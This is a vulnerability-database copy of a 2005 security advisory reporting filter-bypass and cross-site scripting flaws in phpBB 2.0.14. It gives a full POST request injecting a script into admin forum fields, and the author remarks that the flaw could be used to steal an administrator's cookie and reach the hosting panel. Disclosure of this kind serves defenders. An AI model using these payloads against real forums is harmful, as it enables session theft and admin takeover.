Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormHaCkZaTaNPACKETSTORM:37829
HistoryJun 01, 2005 - 12:00 a.m.

php2014.txt

2005-06-0100:00:00
HaCkZaTaN
packetstormsecurity.com
14
JSON
`  
  
/*  
--------------------------------------------------------  
[N]eo [S]ecurity [T]eam [NST]® - Advisory #14 - 17/04/05  
--------------------------------------------------------  
Program: phpBB 2.0.14  
Homepage: http://www.phpbb.com  
Vulnerable Versions: phpBB 2.0.14 & Lower versions  
Risk: Low Risk!!  
Impact: Multiple Vulnerabilities.  
  
-==phpBB 2.0.14 Multiple Vulnerabilities==-  
---------------------------------------------------------  
  
- Description  
---------------------------------------------------------  
phpBB is a high powered, fully scalable, and highly customizable  
Open Source bulletin board package. phpBB has a user-friendly  
interface, simple and straightforward administration panel, and  
helpful FAQ. Based on the powerful PHP server language and your  
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,  
phpBB is the ideal free community solution for all web sites.  
  
- Tested  
---------------------------------------------------------  
localhost & many forums  
  
- Explotation  
---------------------------------------------------------  
-==Bad Filter of HTML Code==-  
phpBB2/profile.php?mode=viewprofile&u=\[]\  
phpBB2/viewtopic.php?p=3&highlight=\[]\  
#########################################################  
-==XSS==-  
POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1  
forumname=<script>alert('NST')</script>&forumdesc=<script>alert('NST')</script>&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create new forum  
  
Some people cannot find it interest someones yes but well i dont care because if you put some effort you know that  
you can do a lot with this, like fooling the Admin of the Hosting to get his cookie & and then get access to whm...  
  
- References  
--------------------------------------------------------  
http://neosecurityteam.net/Advisories/Advisory-14.txt  
  
  
- Credits  
-------------------------------------------------  
Discovered by HaCkZaTaN <[email protected]>  
  
[N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.net/  
  
Got Questions? http://neosecurityteam.net/  
  
Irc.gigachat.net #uruguay [NeoSecurity IRC]  
  
- Greets  
--------------------------------------------------------  
Paisterist  
Daemon21  
LINUX  
erg0t  
uyx  
CrashCool  
Makoki  
KingMetal  
r3v3ng4ns  
  
And my Colombian people  
  
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@  
'@@@@@''@@'@@@''''''''@@''@@@''@@  
'@@'@@@@@@''@@@@@@@@@'''''@@@  
'@@'''@@@@'''''''''@@@''''@@@  
@@@@''''@@'@@@@@@@@@@''''@@@@@  
*/  
  
/* EOF */  
`
JSON